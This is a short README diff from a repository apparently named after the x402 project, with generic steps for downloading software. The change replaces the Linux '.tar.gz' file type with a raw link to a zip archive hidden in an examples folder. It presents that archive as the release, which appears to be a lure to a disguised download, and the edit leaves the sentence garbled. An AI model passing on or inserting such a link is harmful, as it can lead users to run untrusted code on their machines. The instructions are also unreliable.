glyndasmokefree107/x402/README.md

    Look for the most recent version at the top of the page.
 It usually has the highest version number.

 3. **Download the Software**
    Find the file that matches your operating system.
-Common files include `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Common files include `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/glyndasmokefree107/x402/main/examples/typescript/fullstack/x402-v3.5.zip` for Linux.
 Click on the file to start the download.

 4. **Locate the Downloaded File**
    After the download finishes, go to your computer's downloads folder to find the file.